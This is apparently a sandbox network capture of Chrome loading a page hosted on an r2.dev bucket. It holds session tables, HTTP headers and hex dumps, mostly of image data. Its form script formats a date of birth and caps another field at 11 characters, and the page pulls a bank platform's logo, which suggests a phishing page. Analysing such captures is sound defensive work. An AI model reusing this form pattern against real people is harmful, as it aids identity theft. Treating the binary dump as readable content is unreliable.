2025-01-02 16:21:53 UTC	1223	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 2e 76 61 6c 75 65 20 3d 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 30 2c 20 31 31 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 66 6f 72 6d 61 74 44 4f 42 28 69 6e 70 75 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 76 61 6c 75 65 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 20 27 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 76 61 6c 75 65 2e 6c 65 6e 67 74 68 20 3e 20 32 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 30 2c 20 32 29 20 2b 20 27 2f 27 20 2b 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 32 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: input.value = value.slice(0, 11); } function formatDOB(input) { let value = input.value.replace(/\D/g, ''); if (value.length > 2) { value = value.slice(0, 2) + '/' + value.slice(2); }

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	143.204.215.112	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:53 UTC	732	OUT	GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1 Host: assets.orb.alkamitech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:53 UTC	765	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 17791 Connection: close Date: Thu, 02 Jan 2025 16:21:39 GMT x-amz-replication-status: COMPLETED Last-Modified: Wed, 26 Jun 2024 14:47:10 GMT ETag: "568d45d85624d00fa8b18805aded3f12" x-amz-server-side-encryption: AES256 Cache-Control: max-age=3600 Content-Disposition: form-data; name="images/brand-logo-wide.png"; filename="images/brand-logo-wide.png"; filename*=utf-8''images%2Fbrand-logo-wide.png x-amz-version-id: DIT.WLyBkYl.Mw5.LI0AuLaZAJWV3tRm Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 6080b2713e502211e152f21f5c59c5a6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: Wb_IwpxQDfqUKg1Q60h3OZLELdPpyhVAlr-rt35i9GL_6n89hBq12A== Age: 15
2025-01-02 16:21:53 UTC	15990	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 86 08 06 00 00 00 67 8d b7 49 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ed 5d 09 9c 14 d5 d1 af 7a 3d b3 17 20 20 02 62 44 4d f7 ec 2e 87 37 26 f1 8a c1 88 c2 ce aa f1 66 01 51 a3 89 89 1a 8d 46 fd 3e a3 c8 f6 7a 25 46 73 99 c3 2b f1 40 65 67 35 fa 99 63 77 21 5e c4 33 1e 18 15 11 d8 9d ee 20 2a 08 28 c8 b9 d7 f4 ab ef 57 b3 b3 eb cc ec f4 31 b3 37 f4 cb 2f bf c5 e9 77 d4 ab ee fe f7 7b f5 aa fe 85 e0 17 5f 03 be 06 fa 44 03 e7 dd f6 ec a8 d6 b6 58 98 c8 3a 12 01 bf 10 81 fc fb 16 ce 3b e1 c3 3e 19 7c 17 19 04 77 91 79 f8 d3 f0 35 30 a0 35 50 a1 d7 9f 0a 40 f7 13 d1 98 0e 41 11 71 ad 40 71 ee 50 da eb f5 fb f4 23 76 0e e8 09 0c 10 e1 7c c0 1a 20 37 c2 17 63 d7 Data Ascii: PNGIHDR,gIsRGB IDATx^]z= bDM.7&fQF>z%Fs+@eg5cw!^3 *(W17/w{_DX:;>\|wy505P@Aq@qP#v\| 7c
2025-01-02 16:21:53 UTC	1801	IN	Data Raw: cc cb cb db 2b 9d 86 66 c2 84 09 25 ad ad ad 29 21 3d bc 85 37 0c 83 ef 75 bc d8 ac b0 ba 00 96 a6 69 b7 12 d1 f5 3e 60 0d 32 00 ca 56 5c 4d d3 ce 27 a2 87 d2 db 09 21 a6 44 a3 d1 b7 b3 ed 8f eb 67 09 58 7f 4f 73 77 c8 66 c8 d7 4d d3 8c 1b 76 55 55 e5 2d 48 dc 4e 95 04 94 29 0f 7f c7 ef aa aa fe 2f 00 fc 3c b9 6e 77 b7 84 bd 04 58 9d f3 cb a4 14 1b 4f f7 94 ad 97 d7 15 96 a6 69 77 10 d1 35 dd 05 2c 55 55 f9 c0 e3 a5 74 79 47 8e 1c 99 97 6e c0 9f 38 71 e2 b8 96 96 96 2e 66 82 91 23 47 b2 b1 3f 4e 57 e3 75 85 e5 03 56 36 af cd 20 ae 6b f7 80 e5 ea d6 90 f8 2a 66 b3 25 7c 96 88 98 5a 25 eb 82 88 1f 18 86 11 8f 7d 54 55 75 16 00 a4 50 9c d8 ad ec 06 d1 96 d0 0d b0 5c 4f 09 b3 00 2c af 2b 2c 36 ce 77 fa b7 a5 d3 ed 84 42 a1 93 a4 94 6c 4b 4c 2e 64 18 86 92 ee Data Ascii: +f%)!=7ui>`2V\M'!DgXOswfMvUU-HN)/<nwXOiw5,UUtyGn8q.f#G?NWuV6 k*f%\|Z%}TUuP\O,+,6wBlKL.d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	104.23.139.12	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:53 UTC	643	OUT	GET /file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png HTTP/1.1 Host: img001.prntscr.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:53 UTC	790	IN	HTTP/1.1 200 Date: Thu, 02 Jan 2025 16:21:53 GMT Content-Type: image/webp Content-Length: 18222 Connection: close Cache-Control: max-age=31536000 Cf-Bgj: imgq:100,h2pri Cf-Polished: origFmt=png, origSize=30156 Content-Disposition: inline; filename="nBm6LfNrTUqvKQ9HTQUnsQ.webp" Strict-Transport-Security: max-age=63072000 Vary: Accept X-Bz-Upload-Timestamp: 1730745094892 x-bz-content-sha1: 4f20dee394ec4b1c62732975f8ff384f5fa738de x-bz-file-id: 4_z51bcbe33c7b20fe37efb0b11_f116eeb9c2e40980e_d20241104_m183134_c004_v0402008_t0021_u01730745094892 x-bz-file-name: nBm6LfNrTUqvKQ9HTQUnsQ.png Last-Modified: Wed, 25 Dec 2024 01:15:40 GMT CF-Cache-Status: HIT Age: 499506 Accept-Ranges: bytes Server: cloudflare CF-RAY: 8fbc15b019d8199d-EWR alt-svc: h3=":443"; ma=86400
2025-01-02 16:21:53 UTC	579	IN	Data Raw: 52 49 46 46 26 47 00 00 57 45 42 50 56 50 38 4c 1a 47 00 00 2f ff c0 3f 10 09 59 92 64 55 81 15 a7 4f 1f 01 a9 d9 ff 82 01 75 ee e3 3f a2 ff 13 10 ff d5 64 eb cf 32 99 73 86 ed 8f 20 53 92 ba c1 1f 00 39 06 73 46 ef 36 f8 05 90 89 00 ae 4b 77 b3 81 07 40 66 16 99 8b 1d a3 35 1b bc 83 84 9f 9f 5c 69 ad d9 8e 71 b7 40 07 29 26 b9 b2 34 db 8e 39 e7 09 49 30 c6 80 74 6b d5 5b 83 39 79 26 2d 99 6e 23 ed fb 96 f4 4a 40 ce c8 75 4e 15 8f 4a aa c2 e4 9e 17 01 25 91 69 7b 27 e9 8d 24 bc 6e aa 24 f1 02 89 53 2d f5 28 60 61 37 36 bc e9 a8 ee c3 18 a5 7a d7 a5 fb b6 f3 87 5c 78 11 d0 bb ca ed 8a 20 b3 54 63 bc f0 62 fb 8a 88 cc ac 01 99 f9 24 a0 77 9d 6a 7c 10 b8 77 db 4b d5 e0 03 6f 23 62 56 8d 24 d7 67 b1 b4 d6 aa 20 8f 2f c2 e6 ba 58 bf 0a 03 f1 2b 11 c1 f6 37 fe Data Ascii: RIFF&GWEBPVP8LG/?YdUOu?d2s S9sF6Kw@f5\iq@)&49I0tk[9y&-n#J@uNJ%i{'$n$S-(`a76z\x Tcb$wj\|wKo#bV$g /X+7
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 74 1b 5a f5 c4 4a 1d 0c b4 ca 5b 95 0a 30 8e 6a 75 4b e5 7a 03 f4 01 83 b1 13 26 a0 0f 64 c0 0e 9b 7b a6 b0 0d 60 db dc 3b 6e b0 6d 8e 47 c9 9c db dc 1c 60 b7 48 77 ed 06 1a f7 92 03 9b 1b 60 ef a8 db 78 83 12 86 1b 47 8b 37 38 ec 25 4a 60 e3 60 f1 86 1c 07 be 42 e9 01 b4 78 25 3d 68 ef 40 79 5a bc 5c 1d 8a d7 2b 2b fe 4b 3e f1 ff cf b7 85 4b 39 7d 6f dc dd cc 53 04 11 45 da 1e 10 35 ba 21 c3 cf 18 81 82 39 9c f9 fd d7 3a 4f d5 5e 7b 9f 22 ea 97 8f 47 01 d9 f6 7e bd 7c a3 c7 c4 f2 b1 85 a0 88 42 12 d5 5e 4e 7e 25 7c a4 7c 24 7d 15 b4 0b dc e0 a4 7d a0 01 11 2d 02 21 5b d2 15 c8 28 85 1c 21 88 58 21 72 9c c6 b6 ed 54 8b a0 73 0e 1a 8d 47 62 e9 80 fe e8 11 7e 78 6c 22 db 76 b2 04 07 59 06 3d 3d 15 0e 90 82 26 ec e4 0e 03 54 b1 fa 8c 6a db 56 72 3e ee 16 40 Data Ascii: tZJ[0juKz&d{`;nmG`Hw`xG78%J``Bx%=h@yZ\++K>K9}oSE5!9:O^{"G~\|B^N~%\|\|$}}-![(!X!rTsGb~xl"vY==&TjVr>@
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: a7 5f c2 b6 d5 76 cd 28 15 0e 86 f7 5a 16 71 9c 09 0d 0f 8f 84 45 4c 08 04 02 31 83 07 c6 03 e4 56 95 59 52 db 7e e4 aa 6d f5 7c 75 b4 42 0f 04 0e 82 8f f8 a7 62 0d a4 d0 48 a1 38 94 62 1e 11 0a 90 70 04 6a 04 b7 c1 aa 1b b1 4c 65 fa ea a9 6d f5 63 76 d9 3b 47 f7 45 f2 4f 8f 7a 8b 17 02 9d 87 14 2a 01 14 a4 48 0c a5 0e 20 70 49 c2 91 23 71 12 d6 b3 d9 1d e6 31 f5 41 2f a5 6a aa ca 18 53 19 f3 5c cb 5b 87 4e 6d 36 70 41 d4 20 61 98 13 1a 11 09 da 7b 4f 90 fe 49 74 df 07 99 23 8c b2 a9 8c 31 55 65 ac 65 d9 8f 55 b7 b4 ca 54 55 55 19 63 9e b3 35 67 d0 89 28 6c 38 18 83 bb a1 b8 90 a0 95 25 da 7b 67 d0 3e 02 f3 1f ad 5d 32 c6 54 55 55 99 b5 76 d9 ee 07 aa 94 d2 d6 54 a6 aa aa ea 83 bc ae fc 1c 51 44 8e 48 a6 48 21 0a 78 16 d9 07 22 12 a5 90 b4 8f eb f7 ab b3 Data Ascii: _v(ZqEL1VYR~m\|uBbH8bpjLemcv;GEOz*H pI#q1A/jS\[Nm6pA a{OIt#1UeeUTUUc5g(l8%{g>]2TUUvTQDHH!x"
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 68 7c 6c dd ff 5e b6 03 2f ab 56 3e 99 4c f2 25 ab bc aa 8c c1 62 df 9d 42 51 a9 10 60 32 99 4c f2 3c ff 22 f6 fc 7b ad 2b eb c7 6c f4 f8 37 c7 13 41 aa 88 d3 c6 20 00 9c e4 bc 93 e1 0b 07 3c 79 ab e7 bd f4 22 f7 09 fa 00 9b 2a 50 37 76 d3 99 31 ce 0c c7 b6 33 99 d6 12 d5 f1 aa 1c 2e 87 e6 56 29 85 56 b5 c2 4f 83 80 71 7d f1 e3 e9 84 a6 3f 83 66 3f fe f6 d0 e7 f3 5e cc f3 7c 32 99 4c f2 c5 55 55 2d 16 f6 5d 29 54 55 05 58 03 95 49 9e 4f 26 9f 7b 7b f4 03 ec e6 4f 19 8b 1e 7f 2f a0 35 f5 74 79 eb 5a f8 42 28 58 6b 04 35 b0 fd 1f cf 76 c4 91 4e c8 7f ef de 40 07 00 b1 af a0 56 2b 05 2c c0 70 61 66 03 55 da 74 b6 99 47 9a a7 ea e5 e4 12 82 7e 3a d4 40 02 f1 6e 73 0d ac 2f e3 14 ac f7 a3 1b 9f cd 1e 9f 4c f2 7c b2 38 af f2 7c ad b5 b0 ef 45 d1 ad 52 a5 52 01 Data Ascii: h\|l^/V>L%bBQ`2L<"{+l7A <y"*P7v13.V)VOq}?f?^\|2LUU-])TUXIO&{{O/5tyZB(Xk5vN@V+,pafUtG~:@ns/L\|8\|ERR
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: f2 c9 c9 7e c2 ae c5 7a fb dd 52 f5 a2 4a 05 60 94 cd 51 a9 2f b8 bd fe fe b9 6f 43 aa e0 c1 0b ad 6b 1b 5a 97 4c 28 a1 14 38 71 42 2f 2a 26 11 06 7e 5d 74 c9 57 6e f6 dc 67 ac b4 21 b8 4e 27 00 30 a3 0c 02 88 09 0c 71 36 85 92 24 9e b7 2c 8c 58 da a8 33 6e eb e8 b2 c5 8c 38 3b cb 50 e8 c2 6b 78 01 48 d2 0a 6c 71 27 db 07 01 95 02 51 bb dd 68 9c 2a e7 bd b1 f8 59 b6 f7 37 83 ca e4 e4 e4 f2 e5 cb 97 2f 6b f9 b4 96 7d 7b 55 5e aa d5 ad d0 7b 84 f6 5d 33 6b ed 50 78 7b 10 44 52 fa 04 dd 52 c4 82 b7 a8 45 e8 f5 5b 49 84 45 c8 a2 23 3f 79 dc 3f c7 d7 d9 0c 08 04 18 88 0a 0c 19 31 c9 60 a8 93 2a 91 24 03 63 18 64 b1 24 6d 31 89 db 3c 3a 36 e8 06 85 e0 52 70 12 54 88 a2 15 51 14 a3 4c 24 94 14 9c 78 9f d6 c7 da 15 fa 0f 82 be bd 1b 64 b6 3c c8 76 ed b2 9f 2c fb Data Ascii: ~zRJ`Q/oCkZL(8qB/&~]tWng!N'0q6$,X3n8;PkxHlq'QhY7/k}{U^{]3kPx{DRRE[IE#?y?1`*$cd$m1<:6RpTQL$xd<v,
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 59 99 d0 c0 cd f9 2d 44 88 33 f2 c4 5a 80 19 e7 38 e3 cc e0 09 bf 11 03 66 32 10 8a 15 4b 6a 0a f1 42 e7 9f ed e4 3f 3e e7 b2 08 5d af ba 44 50 6b 19 1c 04 e2 10 92 5c f1 75 36 3a ae ea 71 d6 c3 cd 8d 39 31 a7 fc 87 a0 39 57 f5 2d a1 ab e5 07 62 33 f1 ec 62 1b 9c f7 1d 67 7e 1f 97 7b 4c 37 84 d9 fd 9b b9 7d 91 0e 1a 10 84 60 51 aa 9e b7 24 b2 43 3f 7e d1 f3 5c 74 81 0b 3f 71 bb 3e f0 f1 4d c0 ca 66 65 c3 30 c0 66 86 19 43 18 91 89 e4 29 44 ca 56 10 e4 62 84 19 19 19 12 33 66 8c 31 30 30 a4 38 a0 e7 3f ef 6c 4f b8 f6 30 cf 79 dc 89 8e f9 e2 0d 91 4f 1c 96 1d 81 40 80 24 d0 e8 eb 6c 0c 37 18 0f df d8 0c 3f 7e 56 fc f8 39 b2 ff 3c a2 ff e0 b7 56 bd fd b6 da d6 23 bd 0f 84 9f 85 2b df e3 b2 f7 d8 90 1b 74 81 1f fc d4 18 c0 45 79 cb d7 f3 cc fe ff 5b 2f ff c8 Data Ascii: Y-D3Z8f2KjB?>]DPk\u6:q919W-b3bg~{L7}`Q$C?~\t?q>Mfe0fC)DVb3f1008?lO0yO@$l7?~V9<V#+tEy[/
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: b6 d3 29 7d ad 3b b8 9f af de 70 77 8f dd a2 29 34 cd 20 66 24 e3 f2 2e 90 01 2d 3a 06 78 21 01 22 c7 17 c8 b1 50 d8 7d 3b 58 67 b7 76 97 65 b2 c7 b9 44 e4 f0 85 0e 40 cc 90 b9 ca 64 40 e8 ce f5 a6 88 0c 13 84 71 e7 1c 31 10 67 3c 33 3d 7b b6 9f 1b f7 7e be 78 cd 2d 1f 73 ac a9 8d db d8 65 87 23 a4 e5 29 92 22 43 26 e4 46 86 98 4c 40 1b 2d 2c 13 d4 a8 b9 48 08 2e e7 2d b3 dd 2e ac b7 bf 4e bb b5 12 8a 56 1c 27 37 7b 28 65 c3 30 86 19 73 12 54 9c 43 2e 82 71 41 e5 e6 c3 cc f8 d9 24 c6 b8 96 2b f9 c4 f3 f0 00 c7 d1 45 81 b3 e3 fc 67 d0 e9 b4 c4 0c 73 1a 60 98 59 b9 4d 0f e1 85 97 a7 d8 ad 10 fd 0e eb b2 de fa d6 ba de 4c ca 5d 34 25 77 ab d3 6c cd 02 18 86 99 31 e3 0c a0 44 44 78 1e d7 21 40 41 8e 3c 89 eb 41 ee 0b 32 aa fc f8 f3 82 29 26 00 d9 51 e2 7c c7 Data Ascii: )};pw)4 f$.-:x!"P};XgveD@d@q1g<3={~x-se#)"C&FL@-,H.-.NV'7{(e0sTC.qA$+Egs`YML]4%wl1DDx!@A<A2)&Q\|
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: f2 e4 11 c0 6e c2 27 1b 60 29 f5 e6 b7 db e5 a2 79 91 f3 a3 fe b4 e0 30 23 40 5f 0a 4c 81 b8 1e 90 c0 cc 80 d1 5b cf dd dc 4e bf c7 8b 9c 09 a8 49 58 b5 b2 c9 38 67 ae a2 86 08 dc dd 72 f4 67 f1 55 98 3a ce 18 c9 3d 60 b4 87 d7 e1 f1 91 61 44 0e 1a f9 9b be f9 8c 03 b0 28 74 bb 6f cd 76 59 6c b3 69 5f fb f8 31 f5 97 45 30 48 6f 9a 1f 66 c8 19 67 29 9d f3 c4 6c 6a 8a bb b9 13 b8 bb 07 f9 d1 4b 45 ef d3 fb a6 f5 1e c3 a1 51 80 de fd 23 47 7f 56 c3 50 4b 79 8e 90 5b 01 5a e5 59 cd d6 72 39 82 c8 97 28 01 cb 32 59 1b 1e 51 6d c6 31 6b 2c 4a d7 db df 2e b6 d9 b4 ab 9b 95 6f 4b 3c 6e 17 3c 06 66 40 6f 36 ba 6d 40 47 c4 30 07 a5 e7 9c a7 d9 94 38 f7 70 0f 40 ab c1 c3 4b 40 93 7b 82 10 c2 8c 31 03 dc a7 f4 25 47 37 89 64 08 7c 19 c2 09 1d 61 f0 cc 71 76 eb cb a5 Data Ascii: n'`)y0#@_L[NIX8grgU:=`aD(tovYli_1E0Hofg)ljKEQ#GVPKy[ZYr9(2YQm1k,J.oK<n<f@o6m@G08p@K@{1%G7d\|aqv
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 7f 10 af b3 d0 87 c1 b2 4b 79 d5 d3 a2 76 63 71 64 4c a4 90 b5 1d 5a f4 c4 00 14 42 95 98 a0 ef 1c c5 9b 2f a0 9d cb 5f 7d 2f 66 68 79 f3 8e 83 2f b7 b4 00 71 ad a5 5c 1f 97 81 44 f0 95 fb 95 59 39 6e 30 46 9e 31 01 cb 81 07 7b 1f 7c 76 4e 96 7f 50 b0 b4 d4 c3 5c ac 2e db af ab 94 6c bd c5 7d 6a f7 da 44 3e c0 14 3b a6 67 30 8c 58 01 40 58 12 fc f8 a3 83 b8 fd f6 b4 f3 f6 0f e2 bb 70 4e 3b b7 0f 1c bc 34 c5 a3 d6 98 64 21 fb 09 73 41 02 c2 b0 6b ce 37 97 c0 c3 18 08 77 5b e8 f0 aa 41 7a 63 4f fe 4f df 5b 67 3d d6 b5 ce da 2b 56 97 ea 8d db db 44 42 81 69 f1 58 3f 07 a1 72 23 26 45 e4 af 8f e2 e5 dd cc f9 f6 bf 7d 0d 1f cc f4 47 ae 07 0e 5e 71 81 04 ba d6 bd 5c 1b 8c cb 24 6e 6a 7a 96 7e 77 7d 0e e1 11 e0 84 4f 76 a4 c7 98 5b 67 e9 f6 81 ac 7e b2 47 f3 ac Data Ascii: KyvcqdLZB/_}/fhy/q\DY9n0F1{\|vNP\.l}jD>;g0X@XpN;4d!sAk7w[AzcOO[g=+VDBiX?r#&E}G^q\$njz~w}Ov[g~G
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: b8 54 02 ba 3e f1 8d 07 46 dd 02 50 aa 1e ef ea 5a 6b 2c 30 60 18 8f da a7 f5 3c be 67 ea 37 e2 38 e8 91 41 23 d8 a1 47 5a 66 33 1b 90 24 4f 0b 10 68 46 13 55 f8 e6 23 eb b2 f5 87 33 9d 36 2b 89 82 3a 83 9c ae c7 c4 cd cd 5a 78 c3 ac 42 81 1c 4a 61 79 44 be d5 67 45 d9 bd 31 2d c6 b1 ce c0 02 dd 56 f7 01 b1 58 16 00 cc 4b d7 fa 07 f6 ce cd bc d3 a9 04 ba ef b2 2c 80 f6 68 db 3a 86 b9 8c ba 29 38 19 73 85 a5 b4 fd ce 27 5d 56 3e 7a e7 9c 93 29 60 50 c3 75 11 21 91 0b 82 70 ca d6 9d 9c 48 83 65 0e 79 dd c7 72 d0 e0 8a f5 d4 6b f6 f9 f3 bf 59 00 46 a1 0f c9 5a 0b 03 60 f5 e6 ec cf be a2 4d ed 10 c8 eb 04 8a e0 d4 78 b4 ab b1 3e e5 ea b2 96 82 4d 13 4c 61 f8 e0 f3 2f 1b df ea 39 03 88 22 82 84 84 24 32 10 49 8e 24 92 0d 32 a4 94 98 e7 44 0a 01 f8 58 4e 49 72 Data Ascii: T>FPZk,0`<g78A#GZf3$OhFU#36+:ZxBJayDgE1-VXK,h:)8s']V>z)`Pu!pHeyrkYFZ`Mx>MLa/9"$2I$2DXNIr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	104.23.140.12	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:53 UTC	380	OUT	GET /file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png HTTP/1.1 Host: img001.prntscr.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:54 UTC	694	IN	HTTP/1.1 200 Date: Thu, 02 Jan 2025 16:21:54 GMT Content-Type: image/png Content-Length: 26258 Connection: close Cache-Control: max-age=31536000 Cf-Bgj: imgq:100,h2pri Cf-Polished: origSize=30156 Strict-Transport-Security: max-age=63072000 Vary: Accept X-Bz-Upload-Timestamp: 1730745094892 x-bz-content-sha1: 4f20dee394ec4b1c62732975f8ff384f5fa738de x-bz-file-id: 4_z51bcbe33c7b20fe37efb0b11_f116eeb9c2e40980e_d20241104_m183134_c004_v0402008_t0021_u01730745094892 x-bz-file-name: nBm6LfNrTUqvKQ9HTQUnsQ.png Last-Modified: Sun, 29 Dec 2024 16:56:36 GMT CF-Cache-Status: HIT Accept-Ranges: bytes Server: cloudflare CF-RAY: 8fbc15b4dcb0de96-EWR alt-svc: h3=":443"; ma=86400
2025-01-02 16:21:54 UTC	675	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 66 59 49 44 41 54 78 da ec d9 b1 6e da 50 14 c6 71 b0 10 32 08 45 11 95 ca c8 03 f4 11 fa 2a ed d0 66 eb 46 e7 54 1d 9a ad 2c 55 07 84 d2 74 4a 3b f3 28 2c 1d 9b 19 d4 a8 62 42 08 19 bb 3a c2 d6 95 3e 7a 31 56 12 c9 86 ff 4f fa 74 c0 c1 d7 83 73 8e 6d a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 82 27 09 8e 0e 27 f5 38 04 07 a6 71 48 18 08 a7 83 93 58 5d de 26 cf aa a4 69 d5 9b fc cf 06 56 19 06 c7 85 13 57 3d fb 1a be a9 75 4f 42 49 d3 1f 5d d3 1d 93 41 50 6d f5 1a aa 22 d0 2a f1 6c 37 52 f3 c5 5a 5d bc db 76 f7 41 e9 31 00 ca 6f 5f e3 37 3c ef 5d 8c bc 2e d0 fc be 66 8f f4 3d 83 a0 9a 18 Data Ascii: PNGIHDR\rffYIDATxnPq2EfFT,UtJ;(,bB:>z1VOtsm''8qHX]&iVW=uOBI]APm"l7RZ]vA1o_7<].f=
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: f9 4c 74 dc 33 2a a0 62 d0 00 51 d9 1c c2 be ef c4 b0 35 36 60 a3 38 b2 2a da 4d 6f d5 55 ef 4e 1d ea de ef 58 a7 b9 5e 2a 8c 9f 4d 53 97 3e 7d ee bd f5 ba ea bd 47 fd ff 59 ee f2 10 8f c7 41 5a 05 29 20 03 90 a0 27 40 cb ba 3c 2e 45 02 81 4a 7f 4f 15 80 0a 7d 26 7d 36 9d 83 9d 00 48 33 09 48 22 c8 ce 20 74 95 2c 01 34 d4 62 4d f6 19 57 5f 80 bf 0e c0 56 ad 5a 39 b8 47 8f 1e 57 02 00 01 b3 36 5e 9b d4 01 14 14 07 77 ac 05 d0 65 b1 1c 23 de 43 41 d1 67 e8 cf 4a 80 0a 9d 03 9d cb 91 08 4a 90 40 54 e6 04 b2 79 01 57 c9 12 40 43 2c 02 fc 75 ad be 04 bf 04 d7 f6 ed db 47 5e 7e f9 e5 e7 00 0a f1 78 2d c8 52 7b 1a a5 36 8d cc cb 37 be 27 7d 26 7d b6 82 02 9d 0b 9d 93 24 29 49 02 d2 1b c8 26 07 1d 25 4b 00 0d aa 58 ac bd 2b de 67 e0 27 4b 41 32 09 37 f6 ac b3 ce Data Ascii: Lt3bQ56`8MoUNX^*MS>}GYAZ) '@<.EJO}&}6H3H" t,4bMW_VZ9GW6^we#CAgJJ@TyW@C,uG^~x-R{67'}&}$)I&%KX+g'KA27
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: 64 44 8a dc 8b 50 6c 36 12 cf 6e 4f 9e f5 00 8e d9 e2 db c1 ce c0 b6 c7 f9 6c c1 ae ba aa cb b9 1b 36 7c 30 ea de 7b 07 dc 14 8d e6 45 62 64 f5 6b aa 40 80 f0 0c e0 7d 24 b5 0f 19 f0 67 12 ed cf d9 36 07 45 4f 17 a1 68 6c 11 9e 9c f5 24 56 94 ac 40 59 4d 19 94 af 52 67 1e 02 69 bb f0 eb 50 21 05 fa db 15 db 56 e0 c9 99 4f d2 7b d2 7b d3 67 b8 d9 43 4e 1b 16 53 88 8d 37 40 9a 16 12 55 54 56 82 26 0f d1 54 e7 01 f7 de db 73 dd ba b5 a3 e9 9e 09 2f c0 3a 93 90 35 ff 1f 65 13 85 59 02 38 66 e0 3b c6 f2 a3 b6 21 3d d3 0e 87 c3 05 7f fd eb d4 7b 26 4f 9e 32 a4 55 ab 36 85 34 8d b7 aa ba 0a 14 eb 03 04 7a 8f e3 7d 1d 28 b3 28 2b be b8 c2 ad 51 73 47 a1 fb b3 3d b0 7a c7 ea 14 90 7d 07 e0 73 84 84 c1 3a 04 d6 2c f4 de f4 19 f4 59 3c c4 a8 e4 68 00 f7 29 28 48 af Data Ascii: dDPl6nOl6\|0{Ebdk@}$g6EOhl$V@YMRgiP!VO{{gCNS7@UTV&Ts/:5eY8f;!={&O2U64z}((+QsG=z}s:,Y<h)(H
